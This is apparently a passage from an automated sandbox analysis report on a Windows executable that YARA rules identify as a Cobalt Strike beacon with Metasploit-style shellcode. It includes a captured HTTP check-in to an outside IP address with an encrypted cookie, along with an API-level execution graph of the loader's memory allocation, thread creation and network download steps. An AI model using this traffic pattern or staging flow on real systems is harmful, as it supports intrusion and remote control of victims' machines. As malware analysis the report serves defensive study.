                                                                Cookie: U8xKatZnnyNf+63tnaD8TNCwft9xIDoOn5nWATLHYRI0eot/X4aumkZd5DZbMvG1sx5bEHETZnT/TBnUjDUQUQ3UYOCE693F4DpvnX6RDKMW/oGiLKJI7ULmBJpsGWqBnJX+6iRysGDxOZnWWgprxoIwVe2OjIqOTHRmR/jLnac=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; Avant Browser)
                                                                Host: 8.130.42.227:10001
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Oct 1, 2024 09:19:54.270142078 CEST114INHTTP/1.1 200 OK
                                                                Date: Tue, 1 Oct 2024 07:19:54 GMT
                                                                Content-Type: application/octet-stream
                                                                Content-Length: 0


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:03:16:56
                                                                Start date:01/10/2024
                                                                Path:C:\Users\user\Desktop\7kSftA4Eoh.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\user\Desktop\7kSftA4Eoh.exe"
                                                                Imagebase:0x400000
                                                                File size:19'456 bytes
                                                                MD5 hash:71F8B8789A4B0AC3F057F1468579FC23
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4126310737.00000000009F0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.4126310737.00000000009F0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_CobaltStrike_b54b94ac, Description: Rule for beacon sleep obfuscation routine, Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel
                                                                • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                Reputation:low
                                                                Has exited:false

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:2%
                                                                  Dynamic/Decrypted Code Coverage:72.1%
                                                                  Signature Coverage:11.8%
                                                                  Total number of Nodes:262
                                                                  Total number of Limit Nodes:17
                                                                  execution_graph 30285 4014c0 30290 401990 30285->30290 30287 4014d6 30294 401180 30287->30294 30289 4014db 30291 4019d0 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 30290->30291 30292 4019b9 30290->30292 30293 401a2b 30291->30293 30292->30287 30293->30287 30295 401460 GetStartupInfoA 30294->30295 30296 4011b4 30294->30296 30298 4013b4 30295->30298 30297 4011e1 Sleep 30296->30297 30299 4011f6 30296->30299 30297->30296 30298->30289 30299->30298 30300 401229 30299->30300 30301 40142c _initterm 30299->30301 30312 401fd0 30300->30312 30301->30300 30303 401251 SetUnhandledExceptionFilter 30332 4024e0 30303->30332 30305 40130e malloc 30307 401335 30305->30307 30308 40137b 30305->30308 30306 40126d 30306->30305 30309 401340 strlen malloc memcpy 30307->30309 30338 403040 30308->30338 30309->30309 30310 401376 30309->30310 30310->30308 30317 402008 30312->30317 30331 401ff2 30312->30331 30313 402240 30315 40223a 30313->30315 30313->30331 30314 4021ce 30319 40228c 30314->30319 30343 401dc0 8 API calls 30314->30343 30315->30313 30315->30319 30345 401dc0 8 API calls 30315->30345 30316 4022a8 30347 401d50 8 API calls 30316->30347 30317->30313 30317->30314 30317->30316 30327 4020b0 30317->30327 30317->30331 30346 401d50 8 API calls 30319->30346 30321 402208 30344 401dc0 8 API calls 30321->30344 30324 4022b4 30324->30303 30326 401dc0 8 API calls 30326->30327 30327->30314 30327->30319 30327->30321 30327->30326 30328 402156 30327->30328 30329 402160 30327->30329 30328->30329 30330 402192 VirtualProtect 30329->30330 30329->30331 30330->30329 30331->30303 30334 4024ef 30332->30334 30333 40251c 30333->30306 30334->30333 30348 402a80 strncmp 30334->30348 30336 402517 30336->30333 30337 4025c5 RtlAddFunctionTable 30336->30337 30337->30333 30339 40304a 30338->30339 30349 4017f8 GetTickCount 30339->30349 30342 403058 SleepEx 30342->30342 30343->30321 30344->30315 30345->30315 30346->30316 30347->30324 30348->30336 30350 402e28 30349->30350 30351 401866 CreateThread 30350->30351 30352 4017a6 malloc 30351->30352 30367 4016e6 30351->30367 30353 4017c8 SleepEx 30352->30353 30359 401704 CreateFileA 30353->30359 30356 4017de 30364 401595 VirtualAlloc 30356->30364 30358 4017ed 30358->30342 30360 40179c 30359->30360 30363 40175e 30359->30363 30360->30353 30360->30356 30361 401781 CloseHandle 30361->30360 30362 401762 ReadFile 30362->30361 30362->30363 30363->30361 30363->30362 30365 4015c7 30364->30365 30366 4015e8 VirtualProtect CreateThread 30365->30366 30366->30358 30370 401630 CreateNamedPipeA 30367->30370 30371 4016dc 30370->30371 30372 40168f ConnectNamedPipe 30370->30372 30372->30371 30373 4016a3 30372->30373 30374 4016c6 CloseHandle 30373->30374 30375 4016a7 WriteFile 30373->30375 30374->30371 30375->30373 30375->30374 30376 3556e83 30377 3556f10 30376->30377 30380 3557853 30377->30380 30379 3556fb0 30383 355788d 30380->30383 30381 3557984 VirtualAlloc 30382 35579a8 30381->30382 30382->30379 30383->30381 30383->30382 30384 d02eb 30387 d02f8 30384->30387 30385 d030e VirtualAlloc 30385->30387 30386 d0331 InternetReadFile 30386->30387 30387->30385 30387->30386 30388 d035a 30387->30388 30389 9ad840 30390 9ad85c 30389->30390 30393 9ad861 30389->30393 30403 9b47b4 GetSystemTimeAsFileTime GetCurrentThreadId QueryPerformanceCounter __security_init_cookie 30390->30403 30392 9ad8ec 30401 9ad8b6 30392->30401 30405 9a795c 30392->30405 30393->30392 30393->30401 30404 9ad6e0 118 API calls 16 library calls 30393->30404 30396 9ad933 30396->30401 30420 9ad6e0 118 API calls 16 library calls 30396->30420 30398 9a795c _DllMainCRTStartup 243 API calls 30400 9ad926 30398->30400 30419 9ad6e0 118 API calls 16 library calls 30400->30419 30403->30393 30404->30392 30406 9a7a25 30405->30406 30409 9a797e _DllMainCRTStartup 30405->30409 30481 9a97cc 41 API calls 4 library calls 30406->30481 30407 9a7a23 30407->30396 30407->30398 30409->30407 30410 9a79cc _DllMainCRTStartup 30409->30410 30412 9a799d VirtualQuery 30409->30412 30421 99ca74 30410->30421 30412->30410 30413 9a79b4 30412->30413 30414 9a7a08 30413->30414 30415 9a79be 30413->30415 30414->30410 30417 9a7a12 UnmapViewOfFile 30414->30417 30415->30410 30416 9a79de VirtualFree 30415->30416 30416->30410 30418 9a79f3 VirtualFree 30416->30418 30417->30410 30418->30410 30419->30396 30420->30401 30482 9a4720 30421->30482 30423 99ca92 _DllMainCRTStartup 30489 9ab228 30423->30489 30425 99cb23 _DllMainCRTStartup 30506 9aac00 30425->30506 30427 99cb81 30428 9aac00 _DllMainCRTStartup 41 API calls 30427->30428 30429 99cb9b 30428->30429 30513 99efc0 30429->30513 30432 99cba4 30575 9aa324 15 API calls 2 library calls 30432->30575 30434 99cba9 _DllMainCRTStartup 30435 99cbc0 30434->30435 30436 99cbc5 30434->30436 30576 9aa324 15 API calls 2 library calls 30435->30576 30518 99edf8 30436->30518 30440 99cbda 30524 99ee74 30440->30524 30441 99cbd5 30577 9aa324 15 API calls 2 library calls 30441->30577 30445 99cbe3 30578 9aa324 15 API calls 2 library calls 30445->30578 30447 99cbe8 _DllMainCRTStartup 30448 9ab228 malloc 38 API calls 30447->30448 30449 99cc15 30448->30449 30450 99cc1d 30449->30450 30451 99cc22 _DllMainCRTStartup 30449->30451 30579 9aa324 15 API calls 2 library calls 30450->30579 30453 9aac00 _DllMainCRTStartup 41 API calls 30451->30453 30454 99cc3f _DllMainCRTStartup 30453->30454 30536 9a4394 GetACP 30454->30536 30483 9ab228 malloc 38 API calls 30482->30483 30484 9a4741 30483->30484 30485 9ab228 malloc 38 API calls 30484->30485 30488 9a4749 _snprintf _DllMainCRTStartup 30484->30488 30486 9a4755 30485->30486 30486->30488 30580 9ab1e8 30486->30580 30488->30423 30490 9ab2bc 30489->30490 30491 9ab240 30489->30491 30593 9adaac DecodePointer 30490->30593 30493 9ab278 HeapAlloc 30491->30493 30494 9ab258 30491->30494 30499 9ab2a1 30491->30499 30503 9ab2a6 30491->30503 30590 9adaac DecodePointer 30491->30590 30493->30491 30498 9ab2b1 30493->30498 30494->30493 30587 9adae8 34 API calls 2 library calls 30494->30587 30588 9adb5c 34 API calls 6 library calls 30494->30588 30589 9abef4 GetModuleHandleExW GetProcAddress ExitProcess __crtCorExitProcess 30494->30589 30495 9ab2c1 30594 9ada10 8 API calls _getptd_noexit 30495->30594 30498->30425 30591 9ada10 8 API calls _getptd_noexit 30499->30591 30592 9ada10 8 API calls _getptd_noexit 30503->30592 30507 9aac3f 30506->30507 30512 9aac55 _snprintf 30506->30512 30508 9aac4b 30507->30508 30509 9aac57 30507->30509 30511 9ab228 malloc 38 API calls 30508->30511 30595 9ad60c 41 API calls 4 library calls 30509->30595 30511->30512 30512->30427 30514 99efd4 _DllMainCRTStartup 30513->30514 30515 99efda GetLocalTime 30514->30515 30516 99cba0 30514->30516 30517 99f008 _DllMainCRTStartup 30515->30517 30516->30432 30516->30434 30517->30516 30520 99ee0e _DllMainCRTStartup 30518->30520 30519 99cbd1 30519->30440 30519->30441 30520->30519 30596 9a8e44 62 API calls _DllMainCRTStartup 30520->30596 30522 99ee48 30597 9a8e7c 62 API calls 3 library calls 30522->30597 30526 99ee99 _DllMainCRTStartup 30524->30526 30525 99cbdf 30525->30445 30525->30447 30526->30525 30527 99eeeb htonl htonl 30526->30527 30527->30525 30528 99ef0b 30527->30528 30529 9ab228 malloc 38 API calls 30528->30529 30530 99ef15 __crtGetEnvironmentStringsW _DllMainCRTStartup 30529->30530 30531 99ef6b _snprintf 30530->30531 30598 9a8e44 62 API calls _DllMainCRTStartup 30530->30598 30535 9ab1e8 free 8 API calls 30531->30535 30533 99ef4c 30599 9a8e7c 62 API calls 3 library calls 30533->30599 30535->30525 30537 9a43bc getSystemCP 30536->30537 30600 991218 30537->30600 30541 9a43dc __security_init_cookie 30542 9a43e2 GetTickCount 30541->30542 30543 9ac3ec _DllMainCRTStartup 44 API calls 30542->30543 30544 9a43f3 30543->30544 30545 99cf2c _DllMainCRTStartup CryptAcquireContextA CryptAcquireContextA CryptReleaseContext GetSystemTimeAsFileTime 30544->30545 30546 9a43f8 _DllMainCRTStartup 30545->30546 30547 9a4432 30546->30547 30548 9a4420 GetCurrentProcess 30546->30548 30551 9aa754 _DllMainCRTStartup CheckTokenMembership FreeSid 30547->30551 30549 99ff18 _DllMainCRTStartup GetModuleHandleA GetProcAddress 30548->30549 30550 9a442e 30549->30550 30550->30547 30552 9a443a 30551->30552 30553 99dfbc _DllMainCRTStartup htonl 30552->30553 30554 9a4450 30553->30554 30555 99df14 _DllMainCRTStartup htonl 30554->30555 30556 9a4463 30555->30556 30557 99df14 _DllMainCRTStartup htonl 30556->30557 30558 9a4473 30557->30558 30559 99df14 _DllMainCRTStartup htonl 30558->30559 30560 9a4483 30559->30560 30561 99df5c _DllMainCRTStartup htonl htonl 30560->30561 30562 9a4492 __security_init_cookie 30561->30562 30563 99df5c _DllMainCRTStartup htonl htonl 30562->30563 30564 9a44a3 30563->30564 30565 99df8c _DllMainCRTStartup htonl 30564->30565 30566 9a44ae 30565->30566 30567 99def4 _DllMainCRTStartup htonl 30566->30567 30568 9a44b9 30567->30568 30569 9a455c _DllMainCRTStartup 67 API calls 30568->30569 30570 9a44c8 30569->30570 30571 99e028 _DllMainCRTStartup htonl 30570->30571 30572 9a44d1 __crtGetEnvironmentStringsW _snprintf _DllMainCRTStartup 30571->30572 30573 9a9134 _DllMainCRTStartup 38 API calls 30572->30573 30574 9a4529 30573->30574 30581 9ab1ed HeapFree 30580->30581 30585 9ab21d free 30580->30585 30582 9ab208 30581->30582 30581->30585 30586 9ada10 8 API calls _getptd_noexit 30582->30586 30584 9ab20d GetLastError 30584->30585 30585->30488 30586->30584 30587->30494 30588->30494 30590->30491 30591->30503 30592->30498 30593->30495 30594->30498 30595->30512 30596->30522 30597->30519 30598->30533 30599->30531 30606 991184 CryptAcquireContextA 30600->30606 30603 991245 30605 9a961c 38 API calls _DllMainCRTStartup 30603->30605 30607 9911c2 CryptAcquireContextA 30606->30607 30609 9911e6 _DllMainCRTStartup 30606->30609 30608 99120c 30607->30608 30607->30609 30608->30603 30611 9910d0 GetSystemTimeAsFileTime clock 30608->30611 30610 9911fd CryptReleaseContext 30609->30610 30610->30608 30611->30603 30612 9b5730 30613 9b5762 30612->30613 30614 9b5745 30612->30614 30616 9b577a HeapAlloc 30613->30616 30618 9b5758 30613->30618 30621 9adaac DecodePointer 30613->30621 30614->30613 30615 9b5753 30614->30615 30620 9ada10 8 API calls _getptd_noexit 30615->30620 30616->30613 30616->30618 30620->30618 30621->30613 30622 d0000 30625 d00d2 30622->30625 30626 d00df LoadLibraryA InternetOpenA 30625->30626 30627 d017c 30626->30627 30630 d0109 InternetConnectA 30627->30630 30631 d0181 30630->30631 30637 d0128 30631->30637 30633 d030e VirtualAlloc 30634 d0133 30633->30634 30634->30633 30635 d0331 InternetReadFile 30634->30635 30636 d035a 30634->30636 30635->30634 30638 d0133 30637->30638 30639 d030e VirtualAlloc 30638->30639 30640 d0331 InternetReadFile 30638->30640 30641 d035a 30638->30641 30639->30638 30640->30638 30641->30634

                                                                  Executed Functions

                                                                  Function 0099E3A0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 152networkfileCOMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • _snprintf.LIBCMT ref: 0099E439
                                                                    • Part of subcall function 009AB5DC: _errno.LIBCMT ref: 009AB613
                                                                    • Part of subcall function 009AB5DC: _invalid_parameter_noinfo.LIBCMT ref: 009AB61E
                                                                    • Part of subcall function 009A61A8: _snprintf.LIBCMT ref: 009A6315
                                                                  • _snprintf.LIBCMT ref: 0099E493
                                                                  • _snprintf.LIBCMT ref: 0099E4AA
                                                                  • HttpOpenRequestA.WININET ref: 0099E4EF
                                                                  • HttpSendRequestA.WININET ref: 0099E520
                                                                  • InternetQueryDataAvailable.WININET ref: 0099E550
                                                                  • InternetCloseHandle.WININET ref: 0099E56E
                                                                  • InternetReadFile.WININET ref: 0099E5AA
                                                                  • InternetCloseHandle.WININET ref: 0099E5CB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Internet_snprintf$CloseHandleHttpRequest$AvailableDataFileOpenQueryReadSend_errno_invalid_parameter_noinfo
                                                                  • String ID: %s%s$*/*
                                                                  • API String ID: 1419689450-856325523
                                                                  • Opcode ID: 65eb4de1f4f8ae5db4b0ab5bb8916659a9d9aedd41a57e429300d11754b44f1d
                                                                  • Instruction ID: afa78a67d3ed6694d2fddc4470fc08c662859603b561cba97d8ad7ee6e8a193a
                                                                  • Opcode Fuzzy Hash: 65eb4de1f4f8ae5db4b0ab5bb8916659a9d9aedd41a57e429300d11754b44f1d
                                                                  • Instruction Fuzzy Hash: F851DE32700B9186EF20DF26F8407DA77A9F789BA8F404122EE4A57B56EF38C505CB40
                                                                  Function 00401180 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 196sleepstringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 65 401180-4011ae 66 401460-401463 GetStartupInfoA 65->66 67 4011b4-4011d1 65->67 71 401470-40148a call 402e88 66->71 68 4011e9-4011f4 67->68 69 4011f6-401204 68->69 70 4011d8-4011db 68->70 75 401417-401426 call 402e90 69->75 76 40120a-40120e 69->76 73 401400-401411 70->73 74 4011e1-4011e6 Sleep 70->74 73->75 73->76 74->68 83 401229-40122b 75->83 84 40142c-401447 _initterm 75->84 79 401490-4014a9 call 402e80 76->79 80 401214-401223 76->80 91 4014ae-4014b6 call 402e60 79->91 80->83 80->84 86 401231-40123e 83->86 87 40144d-401452 83->87 84->86 84->87 88 401240-401248 86->88 89 40124c-401299 call 401fd0 SetUnhandledExceptionFilter call 4024e0 call 402ef0 call 401d40 call 402f00 86->89 87->86 88->89 103 4012b2-4012b8 89->103 104 40129b 89->104 105 4012a0-4012a2 103->105 106 4012ba-4012c8 103->106 107 4012f0-4012f6 104->107 111 4012a4-4012a7 105->111 112 4012e9 105->112 108 4012ae 106->108 109 4012f8-401302 107->109 110 40130e-401333 malloc 107->110 108->103 113 4013f0-4013f5 109->113 114 401308 109->114 115 401335-40133a 110->115 116 40137b-4013af call 401950 call 403040 110->116 117 4012d0-4012d2 111->117 118 4012a9 111->118 112->107 113->114 114->110 121 401340-401374 strlen malloc memcpy 115->121 127 4013b4-4013c2 116->127 117->112 120 4012d4 117->120 118->108 123 4012d8-4012e2 120->123 121->121 124 401376 121->124 123->112 126 4012e4-4012e7 123->126 124->116 126->112 126->123 127->91 128 4013c8-4013d0 127->128 128->71 129 4013d6-4013e5 128->129
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
                                                                  • String ID: @P@
                                                                  • API String ID: 649803965-1136412694
                                                                  • Opcode ID: b78087a4727109617a980b8b34e7f88b19eb7fde71d655465aeb3eeb3b98bcac
                                                                  • Instruction ID: 0837f65e99a2b31b617579b96e5607858f818787d00fb595da640d4b13c89ff1
                                                                  • Opcode Fuzzy Hash: b78087a4727109617a980b8b34e7f88b19eb7fde71d655465aeb3eeb3b98bcac
                                                                  • Instruction Fuzzy Hash: FB7199B2601B0486EB259F56E99476A33A1F745B88F84803BEF49773A1DF7CC884C748
                                                                  Function 009A455C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116stringCOMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 009A4720: malloc.LIBCMT ref: 009A473C
                                                                  • GetUserNameA.ADVAPI32 ref: 009A45E3
                                                                  • GetComputerNameA.KERNEL32 ref: 009A45F6
                                                                    • Part of subcall function 0099EC3C: WSASocketA.WS2_32 ref: 0099EC6A
                                                                  • GetModuleFileNameA.KERNEL32 ref: 009A460F
                                                                  • strrchr.LIBCMT ref: 009A4621
                                                                  • GetVersionExA.KERNEL32 ref: 009A4644
                                                                  • _snprintf.LIBCMT ref: 009A46CF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Name$ComputerFileModuleSocketUserVersion_snprintfmallocstrrchr
                                                                  • String ID: %s%s%s
                                                                  • API String ID: 2891912487-1891519693
                                                                  • Opcode ID: ce5c5199ac455a2702fc55bf22ab612559c828583a6684ccfc71f8213d57a0fa
                                                                  • Instruction ID: 1193e19d36976dc9b19a50b40b03a3ac565c052e25fd6eaa0de03f9706c9989e
                                                                  • Opcode Fuzzy Hash: ce5c5199ac455a2702fc55bf22ab612559c828583a6684ccfc71f8213d57a0fa
                                                                  • Instruction Fuzzy Hash: B741F125B0468086EE04FB2AB95576A7796F7CAFE4F444120EE5A0BB66CF7CC442C744
                                                                  Function 0099D780 Relevance: 10.9, APIs: 7, Instructions: 395memoryfileCOMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 177 99d780-99d87b call 9a9714 call 9a4838 call 9a4848 * 2 call 9a47dc * 7 200 99d87d-99d893 177->200 201 99d895 177->201 202 99d898-99d8ac 200->202 201->202 203 99d8be 202->203 204 99d8ae-99d8bc 202->204 205 99d8c0-99d8c7 203->205 204->205 206 99d8d9 205->206 207 99d8c9-99d8d7 205->207 208 99d8db-99d8e2 206->208 207->208 209 99d8f4 208->209 210 99d8e4-99d8f2 208->210 211 99d8f6-99d8fd 209->211 210->211 212 99d90f 211->212 213 99d8ff-99d90d 211->213 214 99d911-99d918 212->214 213->214 215 99d92a 214->215 216 99d91a-99d928 214->216 217 99d92c-99d933 215->217 216->217 218 99d945 217->218 219 99d935-99d943 217->219 220 99d947-99d952 218->220 219->220 221 99d95b-99d976 call 9a979c 220->221 222 99d954-99d957 220->222 225 99d978-99d97e 221->225 226 99d984-99d99e call 99d0d8 221->226 222->221 225->226 227 99da95 225->227 231 99da40-99da5c call 9a979c call 9be358 226->231 232 99d9a4-99d9af 226->232 230 99da9b-99daa5 227->230 233 99daa7-99daaf 230->233 234 99dab6-99daf9 call 9ab8c0 call 9ab4d0 call 99dce8 230->234 248 99da62 231->248 235 99da0a-99da0e 232->235 236 99d9b1-99d9d5 CreateFileMappingA 232->236 233->234 257 99dafb-99db37 call 9ab8c0 call 9ab4d0 234->257 258 99db4e-99db52 234->258 235->231 241 99da10-99da2a call 9be328 235->241 239 99da01-99da08 236->239 240 99d9d7-99d9fb MapViewOfFile CloseHandle 236->240 245 99da69-99da6c 239->245 240->239 241->239 253 99da2c-99da3e HeapAlloc 241->253 245->230 249 99da6e-99da90 GetLastError call 99e2b0 245->249 248->245 259 99dcc8-99dce5 249->259 253->248 278 99db39-99db48 257->278 279 99db4a 257->279 261 99db54-99db90 call 9ab8c0 call 9ab4d0 258->261 262 99dba7-99dbab 258->262 290 99dba3 261->290 291 99db92-99dba1 261->291 264 99dbad-99dbe9 call 9ab8c0 call 9ab4d0 262->264 265 99dc00-99dc04 262->265 293 99dbeb-99dbfa 264->293 294 99dbfc 264->294 269 99dc59-99dc60 265->269 270 99dc06-99dc42 call 9ab8c0 call 9ab4d0 265->270 274 99dc88-99dc8c 269->274 275 99dc62-99dc83 call 9ab4d0 269->275 297 99dc55 270->297 298 99dc44-99dc53 270->298 282 99dc8e-99dcc1 call 9ab8c0 call 9ab4d0 274->282 283 99dcc5 274->283 275->274 286 99db4c 278->286 279->286 282->283 283->259 286->258 292 99dba5 290->292 291->292 292->262 299 99dbfe 293->299 294->299 301 99dc57 297->301 298->301 299->265 301->269
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
